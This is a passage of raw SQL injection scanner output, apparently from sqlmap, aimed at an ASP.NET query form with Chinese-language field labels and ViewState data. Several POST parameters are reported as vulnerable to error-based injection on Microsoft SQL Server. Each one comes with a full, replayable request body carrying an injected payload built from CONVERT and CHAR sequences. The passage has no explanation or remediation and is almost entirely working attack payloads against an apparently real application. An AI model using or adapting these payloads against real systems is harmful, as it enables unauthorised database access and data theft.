WBB4KUXVlcnlTdGF0ZQspZVN1cGVyOC5FbnRpdHkuQ29tbW9uLlF1ZXJ5U3RhdGUsIFN1cGVyOC5FbnR
pdHksIFZlcnNpb249MS4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1udWxsAh4
OT3JkZXJDb25kaXRpb24FGFN0YXRlIERFU0MsVGhlT3JkZXIgREVTQxYCZg9kFgJmD2QWAgIDD2QWAgI
GD2QWAgIDD2QWCAIBD2QWDAIDDw8WAh4HRW5hYmxlZGhkZAIFDw8WAh8CaGRkAgcPDxYCHwJoZGQCCQ8
PFgIfAmhkZAILDw8WAh8CaGRkAhUPDxYCHg1XYXRlcm1hcmtUZXh0BRXor7fovpPlhaXmn6Xor6LmnaH
ku7ZkFgJmD2QWAgIDDxYCHwMFFeivt+i+k+WFpeafpeivouadoeS7tmQCAw88KwARAwAPFgoeC18hRGF
0YUJvdW5kZx4Icm93Q291bnQCAR4RSXNFbXB0eURhdGFTb3VyY2VnHgtfIUl0ZW1Db3VudGYeL0Vzb2Z
0X19TbWFydEdyaWRWaWV3X19TbWFydFJhZGlvQnV0dG9uR3JvdXBOYW1lBRZTbWFydFJhZGlvQnV0dG9
uQ29sdW1uZAEQFgAWABYADBQrAAAWAmYPZBYIAgEPZBYSZg8PFgIeBFRleHRlZGQCAQ8PFgIfCWVkZAI
CDw8WAh8JZWRkAgMPDxYCHwllZGQCBA8PFgIfCWVkZAIFDw8WAh8JZWRkAgYPDxYCHwllZGQCBw8PFgI
fCWVkZAIIDw8WAh8JZWRkAgIPDxYCHgdWaXNpYmxlaGRkAgMPDxYCHwpoZGQCBA9kFgJmD2QWAmYPZBY
CZg9kFgICAQ9kFgICAg9kFghmDw8WAh8CaGRkAgEPDxYCHwJoZGQCAg8PFgIfAmhkZAIDDw8WAh8CaGR
kAgcPZBYCAgMPZBYCZg9kFgICAw9kFggCBQ9kFgRmDw8WBB4eRXNvZnRfX1NtYXJ0Q2FsZW5kYXJfX1R
hcmdldElEBQdzY1JpZ2h0HwkFCjIwMTUtMDctMjhkZAICDw8WBB8LBQZzY0xlZnQfCQUKMjAxNS0wOC0
xMWRkAgcPZBYEZg8PFgQfCwUHc2NSaWdodB8JBQoyMDE1LTA4LTA1ZGQCAg8PFgQfCwUGc2NMZWZ0Hwk
FCjIwMTUtMDgtMDZkZAIND2QWBGYPDxYCHwkFATFkZAICDw8WAh8JBQE1ZGQCDw8QDxYGHg1EYXRhVGV
4dEZpZWxkBQVWYWx1ZR4ORGF0YVZhbHVlRmllbGQFBVZhbHVlHwRnZBAVDA0tLeivt+mAieaLqS0tCeW
3suWIoOmZpAnlt7LlgZznlKgJ5bey5ZCv55SoCeWPr+e8lui+kQnlt7LnlJ/mlYgJ5b6F5a6h5qC4CeW
3suWuoeaguAnlt7Lmi5Lnu50J5pyq5a6M5oiQCeW3suWujOaIkAnlt7Lmj5DkuqQVDAAJ5bey5Yig6Zm
kCeW3suWBnOeUqAnlt7LlkK/nlKgJ5Y+v57yW6L6RCeW3sueUn+aViAnlvoXlrqHmoLgJ5bey5a6h5qC
4CeW3suaLkue7nQnmnKrlrozmiJAJ5bey5a6M5oiQCeW3suaPkOS6pBQrAwxnZ2dnZ2dnZ2dnZ2dkZAI
ND2QWAgIDD2QWAmYPZBYCAgMPZBYEAgEPEGQQFQYM6KGo5Y2V5ZCN56ewBuaPj+i/sAzliJvlu7rml7b
pl7QS5pyA5ZCO5L+u5pS55pe26Ze0EuWIm+W7uueUqOaIt+WQjeensBjmnIDlkI7kv67mlLnnlKjmiLf
lkI3np7AVBghGb3JtTmFtZQtEZXNjcmlwdGlvbgpDcmVhdGVUaW1lDkxhc3RNb2RpZnlUaW1lDkNyZWF
0ZVVzZXJOYW1lEkxhc3RNb2RpZnlVc2VyTmFtZRQrAwZnZ2dnZ2dkZAILDxBkDxYCZgIBFgIQBQ7nirb
mgIEgIOWAkuW6jwUFU3RhdGVnEAUR5o6S5bqP5Y+3ICDlgJLluo8FCFRoZU9yZGVyZ2RkGAIFHl9fQ29
udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYIBUFjdGwwMCRjdGwwMCRDb250ZW50UGxhY2VIb2xkZXI
xJENvbnRlbnRQbGFjZUhvbGRlcjIkY2JBbGxvd1BhZ2luZwVFY3RsMDAkY3RsMDAkQ29udGVudFBsYWN
lSG9sZGVyMSRDb250ZW50UGxhY2VIb2xkZXIyJGlidG5BZHZhbmNlZFF1ZXJ5BUBjdGwwMCRjdGwwMCR
Db250ZW50UGxhY2VIb2xkZXIxJENvbnRlbnRQbGFjZUhvbGRlcjIkaWJ0bk9yZGVyaW5nBUBjdGwwMCR
jdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJENvbnRlbnRQbGFjZUhvbGRlcjIkbGJPcmRlcmluZ05vBT5
jdGwwMCRjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJENvbnRlbnRQbGFjZUhvbGRlcjIkcmJ0bkFzY2V
uZAU+Y3RsMDAkY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRDb250ZW50UGxhY2VIb2xkZXIyJHJidG5
Bc2NlbmQFP2N0bDAwJGN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkQ29udGVudFBsYWNlSG9sZGVyMiR
yYnRuRGVzY2VuZAVBY3RsMDAkY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRDb250ZW50UGxhY2VIb2x
kZXIyJGxiT3JkZXJpbmdZZXMFPWN0bDAwJGN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkQ29udGVudFB
sYWNlSG9sZGVyMiRndkJOX0Zvcm0PPCsADAEIAgFk1AaHLga3ih3M2ubiWQKM0xV416HWT3j8uNGC3+B
n5jU=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$wtxtAdvancedQuery$txtW
atermarked=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$wtxtAdvancedQuer
y$TextBoxWatermarkExtender1_ClientState=&ctl00$ctl00$ContentPlaceHolder1$Content
PlaceHolder2$cbAllowPaging=on&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder
2$hfOrdering=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$Order=rbtnDesc
end&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$lbOrderingYes=State&ctl0
0$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$lbOrderingYes=TheOrder&ctl00$ctl
00$ContentPlaceHolder1$ContentPlaceHolder2$hfAdvancedQuery=&ctl00$ctl00$ContentP
laceHolder1$ContentPlaceHolder2$txtFormName=1%' AND 8752=CONVERT(INT,(SELECT CHA
R(113)+CHAR(121)+CHAR(108)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (8752=8752) TH
EN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(105)+CHAR(110)+CHAR(113
))) AND '%'='&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtDescription
=2&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucCreateTime$scLeft=2015-
07-28&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucCreateTime$scRight=2
015-08-11&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucLastModifyTime$s
cLeft=2015-08-05&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucLastModif
yTime$scRight=2015-08-06&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txt
CreateUserName=3&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtLastModi
fyUserName=4&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucTheOrder$scLe
ft=1&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucTheOrder$scRight=5&ct
l00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ddlState=&ctl00$ctl00$ContentP
laceHolder1$ContentPlaceHolder2$btnOKAdvancedQuery=%E7%A1%AE%E5%AE%9A
Place: POST
Parameter: ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtDescription
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMjA3ODgzNDEyMw8
WBB4KUXVlcnlTdGF0ZQspZVN1cGVyOC5FbnRpdHkuQ29tbW9uLlF1ZXJ5U3RhdGUsIFN1cGVyOC5FbnR
pdHksIFZlcnNpb249MS4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1udWxsAh4
OT3JkZXJDb25kaXRpb24FGFN0YXRlIERFU0MsVGhlT3JkZXIgREVTQxYCZg9kFgJmD2QWAgIDD2QWAgI
GD2QWAgIDD2QWCAIBD2QWDAIDDw8WAh4HRW5hYmxlZGhkZAIFDw8WAh8CaGRkAgcPDxYCHwJoZGQCCQ8
PFgIfAmhkZAILDw8WAh8CaGRkAhUPDxYCHg1XYXRlcm1hcmtUZXh0BRXor7fovpPlhaXmn6Xor6LmnaH
ku7ZkFgJmD2QWAgIDDxYCHwMFFeivt+i+k+WFpeafpeivouadoeS7tmQCAw88KwARAwAPFgoeC18hRGF
0YUJvdW5kZx4Icm93Q291bnQCAR4RSXNFbXB0eURhdGFTb3VyY2VnHgtfIUl0ZW1Db3VudGYeL0Vzb2Z
0X19TbWFydEdyaWRWaWV3X19TbWFydFJhZGlvQnV0dG9uR3JvdXBOYW1lBRZTbWFydFJhZGlvQnV0dG9
uQ29sdW1uZAEQFgAWABYADBQrAAAWAmYPZBYIAgEPZBYSZg8PFgIeBFRleHRlZGQCAQ8PFgIfCWVkZAI
CDw8WAh8JZWRkAgMPDxYCHwllZGQCBA8PFgIfCWVkZAIFDw8WAh8JZWRkAgYPDxYCHwllZGQCBw8PFgI
fCWVkZAIIDw8WAh8JZWRkAgIPDxYCHgdWaXNpYmxlaGRkAgMPDxYCHwpoZGQCBA9kFgJmD2QWAmYPZBY
CZg9kFgICAQ9kFgICAg9kFghmDw8WAh8CaGRkAgEPDxYCHwJoZGQCAg8PFgIfAmhkZAIDDw8WAh8CaGR
kAgcPZBYCAgMPZBYCZg9kFgICAw9kFggCBQ9kFgRmDw8WBB4eRXNvZnRfX1NtYXJ0Q2FsZW5kYXJfX1R
hcmdldElEBQdzY1JpZ2h0HwkFCjIwMTUtMDctMjhkZAICDw8WBB8LBQZzY0xlZnQfCQUKMjAxNS0wOC0
xMWRkAgcPZBYEZg8PFgQfCwUHc2NSaWdodB8JBQoyMDE1LTA4LTA1ZGQCAg8PFgQfCwUGc2NMZWZ0Hwk
FCjIwMTUtMDgtMDZkZAIND2QWBGYPDxYCHwkFATFkZAICDw8WAh8JBQE1ZGQCDw8QDxYGHg1EYXRhVGV
4dEZpZWxkBQVWYWx1ZR4ORGF0YVZhbHVlRmllbGQFBVZhbHVlHwRnZBAVDA0tLeivt+mAieaLqS0tCeW
3suWIoOmZpAnlt7LlgZznlKgJ5bey5ZCv55SoCeWPr+e8lui+kQnlt7LnlJ/mlYgJ5b6F5a6h5qC4CeW
3suWuoeaguAnlt7Lmi5Lnu50J5pyq5a6M5oiQCeW3suWujOaIkAnlt7Lmj5DkuqQVDAAJ5bey5Yig6Zm
kCeW3suWBnOeUqAnlt7LlkK/nlKgJ5Y+v57yW6L6RCeW3sueUn+aViAnlvoXlrqHmoLgJ5bey5a6h5qC
4CeW3suaLkue7nQnmnKrlrozmiJAJ5bey5a6M5oiQCeW3suaPkOS6pBQrAwxnZ2dnZ2dnZ2dnZ2dkZAI
ND2QWAgIDD2QWAmYPZBYCAgMPZBYEAgEPEGQQFQYM6KGo5Y2V5ZCN56ewBuaPj+i/sAzliJvlu7rml7b
pl7QS5pyA5ZCO5L+u5pS55pe26Ze0EuWIm+W7uueUqOaIt+WQjeensBjmnIDlkI7kv67mlLnnlKjmiLf
lkI3np7AVBghGb3JtTmFtZQtEZXNjcmlwdGlvbgpDcmVhdGVUaW1lDkxhc3RNb2RpZnlUaW1lDkNyZWF
0ZVVzZXJOYW1lEkxhc3RNb2RpZnlVc2VyTmFtZRQrAwZnZ2dnZ2dkZAILDxBkDxYCZgIBFgIQBQ7nirb
mgIEgIOWAkuW6jwUFU3RhdGVnEAUR5o6S5bqP5Y+3ICDlgJLluo8FCFRoZU9yZGVyZ2RkGAIFHl9fQ29
udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYIBUFjdGwwMCRjdGwwMCRDb250ZW50UGxhY2VIb2xkZXI
xJENvbnRlbnRQbGFjZUhvbGRlcjIkY2JBbGxvd1BhZ2luZwVFY3RsMDAkY3RsMDAkQ29udGVudFBsYWN
lSG9sZGVyMSRDb250ZW50UGxhY2VIb2xkZXIyJGlidG5BZHZhbmNlZFF1ZXJ5BUBjdGwwMCRjdGwwMCR
Db250ZW50UGxhY2VIb2xkZXIxJENvbnRlbnRQbGFjZUhvbGRlcjIkaWJ0bk9yZGVyaW5nBUBjdGwwMCR
jdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJENvbnRlbnRQbGFjZUhvbGRlcjIkbGJPcmRlcmluZ05vBT5
jdGwwMCRjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJENvbnRlbnRQbGFjZUhvbGRlcjIkcmJ0bkFzY2V
uZAU+Y3RsMDAkY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRDb250ZW50UGxhY2VIb2xkZXIyJHJidG5
Bc2NlbmQFP2N0bDAwJGN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkQ29udGVudFBsYWNlSG9sZGVyMiR
yYnRuRGVzY2VuZAVBY3RsMDAkY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRDb250ZW50UGxhY2VIb2x
kZXIyJGxiT3JkZXJpbmdZZXMFPWN0bDAwJGN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkQ29udGVudFB
sYWNlSG9sZGVyMiRndkJOX0Zvcm0PPCsADAEIAgFk1AaHLga3ih3M2ubiWQKM0xV416HWT3j8uNGC3+B
n5jU=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$wtxtAdvancedQuery$txtW
atermarked=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$wtxtAdvancedQuer
y$TextBoxWatermarkExtender1_ClientState=&ctl00$ctl00$ContentPlaceHolder1$Content
PlaceHolder2$cbAllowPaging=on&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder
2$hfOrdering=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$Order=rbtnDesc
end&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$lbOrderingYes=State&ctl0
0$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$lbOrderingYes=TheOrder&ctl00$ctl
00$ContentPlaceHolder1$ContentPlaceHolder2$hfAdvancedQuery=&ctl00$ctl00$ContentP
laceHolder1$ContentPlaceHolder2$txtFormName=1&ctl00$ctl00$ContentPlaceHolder1$Co
ntentPlaceHolder2$txtDescription=2%' AND 1740=CONVERT(INT,(SELECT CHAR(113)+CHAR
(121)+CHAR(108)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (1740=1740) THEN CHAR(49)
ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(105)+CHAR(110)+CHAR(113))) AND '%'
='&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucCreateTime$scLeft=2015-
07-28&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucCreateTime$scRight=2
015-08-11&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucLastModifyTime$s
cLeft=2015-08-05&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucLastModif
yTime$scRight=2015-08-06&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txt
CreateUserName=3&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtLastModi
fyUserName=4&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucTheOrder$scLe
ft=1&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucTheOrder$scRight=5&ct
l00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ddlState=&ctl00$ctl00$ContentP
laceHolder1$ContentPlaceHolder2$btnOKAdvancedQuery=%E7%A1%AE%E5%AE%9A
Place: POST
Parameter: ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtCreateUserName
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMjA3ODgzNDEyMw8
WBB4KUXVlcnlTdGF0ZQspZVN1cGVyOC5FbnRpdHkuQ29tbW9uLlF1ZXJ5U3RhdGUsIFN1cGVyOC5FbnR
pdHksIFZlcnNpb249MS4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1udWxsAh4
OT3JkZXJDb25kaXRpb24FGFN0YXRlIERFU0MsVGhlT3JkZXIgREVTQxYCZg9kFgJmD2QWAgIDD2QWAgI
GD2QWAgIDD2QWCAIBD2QWDAIDDw8WAh4HRW5hYmxlZGhkZAIFDw8WAh8CaGRkAgcPDxYCHwJoZGQCCQ8
PFgIfAmhkZAILDw8WAh8CaGRkAhUPDxYCHg1XYXRlcm1hcmtUZXh0BRXor7fovpPlhaXmn6Xor6LmnaH
ku7ZkFgJmD2QWAgIDDxYCHwMFFeivt+i+k+WFpeafpeivouadoeS7tmQCAw88KwARAwAPFgoeC18hRGF
0YUJvdW5kZx4Icm93Q291bnQCAR4RSXNFbXB0eURhdGFTb3VyY2VnHgtfIUl0ZW1Db3VudGYeL0Vzb2Z
0X19TbWFydEdyaWRWaWV3X19TbWFydFJhZGlvQnV0dG9uR3JvdXBOYW1lBRZTbWFydFJhZGlvQnV0dG9
uQ29sdW1uZAEQFgAWABYADBQrAAAWAmYPZBYIAgEPZBYSZg8PFgIeBFRleHRlZGQCAQ8PFgIfCWVkZAI
CDw8WAh8JZWRkAgMPDxYCHwllZGQCBA8PFgIfCWVkZAIFDw8WAh8JZWRkAgYPDxYCHwllZGQCBw8PFgI
fCWVkZAIIDw8WAh8JZWRkAgIPDxYCHgdWaXNpYmxlaGRkAgMPDxYCHwpoZGQCBA9kFgJmD2QWAmYPZBY
CZg9kFgICAQ9kFgICAg9kFghmDw8WAh8CaGRkAgEPDxYCHwJoZGQCAg8PFgIfAmhkZAIDDw8WAh8CaGR
kAgcPZBYCAgMPZBYCZg9kFgICAw9kFggCBQ9kFgRmDw8WBB4eRXNvZnRfX1NtYXJ0Q2FsZW5kYXJfX1R
hcmdldElEBQdzY1JpZ2h0HwkFCjIwMTUtMDctMjhkZAICDw8WBB8LBQZzY0xlZnQfCQUKMjAxNS0wOC0
xMWRkAgcPZBYEZg8PFgQfCwUHc2NSaWdodB8JBQoyMDE1LTA4LTA1ZGQCAg8PFgQfCwUGc2NMZWZ0Hwk
FCjIwMTUtMDgtMDZkZAIND2QWBGYPDxYCHwkFATFkZAICDw8WAh8JBQE1ZGQCDw8QDxYGHg1EYXRhVGV
4dEZpZWxkBQVWYWx1ZR4ORGF0YVZhbHVlRmllbGQFBVZhbHVlHwRnZBAVDA0tLeivt+mAieaLqS0tCeW
3suWIoOmZpAnlt7LlgZznlKgJ5bey5ZCv55SoCeWPr+e8lui+kQnlt7LnlJ/mlYgJ5b6F5a6h5qC4CeW
3suWuoeaguAnlt7Lmi5Lnu50J5pyq5a6M5oiQCeW3suWujOaIkAnlt7Lmj5DkuqQVDAAJ5bey5Yig6Zm
kCeW3suWBnOeUqAnlt7LlkK/nlKgJ5Y+v57yW6L6RCeW3sueUn+aViAnlvoXlrqHmoLgJ5bey5a6h5qC
4CeW3suaLkue7nQnmnKrlrozmiJAJ5bey5a6M5oiQCeW3suaPkOS6pBQrAwxnZ2dnZ2dnZ2dnZ2dkZAI
ND2QWAgIDD2QWAmYPZBYCAgMPZBYEAgEPEGQQFQYM6KGo5Y2V5ZCN56ewBuaPj+i/sAzliJvlu7rml7b
pl7QS5pyA5ZCO5L+u5pS55pe26Ze0EuWIm+W7uueUqOaIt+WQjeensBjmnIDlkI7kv67mlLnnlKjmiLf
lkI3np7AVBghGb3JtTmFtZQtEZXNjcmlwdGlvbgpDcmVhdGVUaW1lDkxhc3RNb2RpZnlUaW1lDkNyZWF
0ZVVzZXJOYW1lEkxhc3RNb2RpZnlVc2VyTmFtZRQrAwZnZ2dnZ2dkZAILDxBkDxYCZgIBFgIQBQ7nirb
mgIEgIOWAkuW6jwUFU3RhdGVnEAUR5o6S5bqP5Y+3ICDlgJLluo8FCFRoZU9yZGVyZ2RkGAIFHl9fQ29
udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYIBUFjdGwwMCRjdGwwMCRDb250ZW50UGxhY2VIb2xkZXI
xJENvbnRlbnRQbGFjZUhvbGRlcjIkY2JBbGxvd1BhZ2luZwVFY3RsMDAkY3RsMDAkQ29udGVudFBsYWN
lSG9sZGVyMSRDb250ZW50UGxhY2VIb2xkZXIyJGlidG5BZHZhbmNlZFF1ZXJ5BUBjdGwwMCRjdGwwMCR
Db250ZW50UGxhY2VIb2xkZXIxJENvbnRlbnRQbGFjZUhvbGRlcjIkaWJ0bk9yZGVyaW5nBUBjdGwwMCR
jdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJENvbnRlbnRQbGFjZUhvbGRlcjIkbGJPcmRlcmluZ05vBT5
jdGwwMCRjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJENvbnRlbnRQbGFjZUhvbGRlcjIkcmJ0bkFzY2V
uZAU+Y3RsMDAkY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRDb250ZW50UGxhY2VIb2xkZXIyJHJidG5
Bc2NlbmQFP2N0bDAwJGN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkQ29udGVudFBsYWNlSG9sZGVyMiR
yYnRuRGVzY2VuZAVBY3RsMDAkY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRDb250ZW50UGxhY2VIb2x
kZXIyJGxiT3JkZXJpbmdZZXMFPWN0bDAwJGN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkQ29udGVudFB
sYWNlSG9sZGVyMiRndkJOX0Zvcm0PPCsADAEIAgFk1AaHLga3ih3M2ubiWQKM0xV416HWT3j8uNGC3+B
n5jU=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$wtxtAdvancedQuery$txtW
atermarked=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$wtxtAdvancedQuer
y$TextBoxWatermarkExtender1_ClientState=&ctl00$ctl00$ContentPlaceHolder1$Content
PlaceHolder2$cbAllowPaging=on&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder
2$hfOrdering=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$Order=rbtnDesc
end&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$lbOrderingYes=State&ctl0
0$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$lbOrderingYes=TheOrder&ctl00$ctl
00$ContentPlaceHolder1$ContentPlaceHolder2$hfAdvancedQuery=&ctl00$ctl00$ContentP
laceHolder1$ContentPlaceHolder2$txtFormName=1&ctl00$ctl00$ContentPlaceHolder1$Co
ntentPlaceHolder2$txtDescription=2&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceH
older2$ucCreateTime$scLeft=2015-07-28&ctl00$ctl00$ContentPlaceHolder1$ContentPla
ceHolder2$ucCreateTime$scRight=2015-08-11&ctl00$ctl00$ContentPlaceHolder1$Conten
tPlaceHolder2$ucLastModifyTime$scLeft=2015-08-05&ctl00$ctl00$ContentPlaceHolder1
$ContentPlaceHolder2$ucLastModifyTime$scRight=2015-08-06&ctl00$ctl00$ContentPlac
eHolder1$ContentPlaceHolder2$txtCreateUserName=3%' AND 4061=CONVERT(INT,(SELECT
CHAR(113)+CHAR(121)+CHAR(108)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (4061=4061)
THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(105)+CHAR(110)+CHAR(
113))) AND '%'='&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtLastModi
fyUserName=4&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucTheOrder$scLe
ft=1&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucTheOrder$scRight=5&ct
l00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ddlState=&ctl00$ctl00$ContentP
laceHolder1$ContentPlaceHolder2$btnOKAdvancedQuery=%E7%A1%AE%E5%AE%9A
Place: POST
Parameter: ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtLastModifyUser
Name
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMjA3ODgzNDEyMw8
WBB4KUXVlcnlTdGF0ZQspZVN1cGVyOC5FbnRpdHkuQ29tbW9uLlF1ZXJ5U3RhdGUsIFN1cGVyOC5FbnR
pdHksIFZlcnNpb249MS4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1udWxsAh4
OT3JkZXJDb25kaXRpb24FGFN0YXRlIERFU0MsVGhlT3JkZXIgREVTQxYCZg9kFgJmD2QWAgIDD2QWAgI
GD2QWAgIDD2QWCAIBD2QWDAIDDw8WAh4HRW5hYmxlZGhkZAIFDw8WAh8CaGRkAgcPDxYCHwJoZGQCCQ8
PFgIfAmhkZAILDw8WAh8CaGRkAhUPDxYCHg1XYXRlcm1hcmtUZXh0BRXor7fovpPlhaXmn6Xor6LmnaH
ku7ZkFgJmD2QWAgIDDxYCHwMFFeivt+i+k+WFpeafpeivouadoeS7tmQCAw88KwARAwAPFgoeC18hRGF
0YUJvdW5kZx4Icm93Q291bnQCAR4RSXNFbXB0eURhdGFTb3VyY2VnHgtfIUl0ZW1Db3VudGYeL0Vzb2Z
0X19TbWFydEdyaWRWaWV3X19TbWFydFJhZGlvQnV0dG9uR3JvdXBOYW1lBRZTbWFydFJhZGlvQnV0dG9
uQ29sdW1uZAEQFgAWABYADBQrAAAWAmYPZBYIAgEPZBYSZg8PFgIeBFRleHRlZGQCAQ8PFgIfCWVkZAI
CDw8WAh8JZWRkAgMPDxYCHwllZGQCBA8PFgIfCWVkZAIFDw8WAh8JZWRkAgYPDxYCHwllZGQCBw8PFgI
fCWVkZAIIDw8WAh8JZWRkAgIPDxYCHgdWaXNpYmxlaGRkAgMPDxYCHwpoZGQCBA9kFgJmD2QWAmYPZBY
CZg9kFgICAQ9kFgICAg9kFghmDw8WAh8CaGRkAgEPDxYCHwJoZGQCAg8PFgIfAmhkZAIDDw8WAh8CaGR
kAgcPZBYCAgMPZBYCZg9kFgICAw9kFggCBQ9kFgRmDw8WBB4eRXNvZnRfX1NtYXJ0Q2FsZW5kYXJfX1R
hcmdldElEBQdzY1JpZ2h0HwkFCjIwMTUtMDctMjhkZAICDw8WBB8LBQZzY0xlZnQfCQUKMjAxNS0wOC0
xMWRkAgcPZBYEZg8PFgQfCwUHc2NSaWdodB8JBQoyMDE1LTA4LTA1ZGQCAg8PFgQfCwUGc2NMZWZ0Hwk
FCjIwMTUtMDgtMDZkZAIND2QWBGYPDxYCHwkFATFkZAICDw8WAh8JBQE1ZGQCDw8QDxYGHg1EYXRhVGV
4dEZpZWxkBQVWYWx1ZR4ORGF0YVZhbHVlRmllbGQFBVZhbHVlHwRnZBAVDA0tLeivt+mAieaLqS0tCeW
3suWIoOmZpAnlt7LlgZznlKgJ5bey5ZCv55SoCeWPr+e8lui+kQnlt7LnlJ/mlYgJ5b6F5a6h5qC4CeW
3suWuoeaguAnlt7Lmi5Lnu50J5pyq5a6M5oiQCeW3suWujOaIkAnlt7Lmj5DkuqQVDAAJ5bey5Yig6Zm
kCeW3suWBnOeUqAnlt7LlkK/nlKgJ5Y+v57yW6L6RCeW3sueUn+aViAnlvoXlrqHmoLgJ5bey5a6h5qC
4CeW3suaLkue7nQnmnKrlrozmiJAJ5bey5a6M5oiQCeW3suaPkOS6pBQrAwxnZ2dnZ2dnZ2dnZ2dkZAI
ND2QWAgIDD2QWAmYPZBYCAgMPZBYEAgEPEGQQFQYM6KGo5Y2V5ZCN56ewBuaPj+i/sAzliJvlu7rml7b
pl7QS5pyA5ZCO5L+u5pS55pe26Ze0EuWIm+W7uueUqOaIt+WQjeensBjmnIDlkI7kv67mlLnnlKjmiLf
lkI3np7AVBghGb3JtTmFtZQtEZXNjcmlwdGlvbgpDcmVhdGVUaW1lDkxhc3RNb2RpZnlUaW1lDkNyZWF
0ZVVzZXJOYW1lEkxhc3RNb2RpZnlVc2VyTmFtZRQrAwZnZ2dnZ2dkZAILDxBkDxYCZgIBFgIQBQ7nirb
mgIEgIOWAkuW6jwUFU3RhdGVnEAUR5o6S5bqP5Y+3ICDlgJLluo8FCFRoZU9yZGVyZ2RkGAIFHl9fQ29
udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYIBUFjdGwwMCRjdGwwMCRDb250ZW50UGxhY2VIb2xkZXI
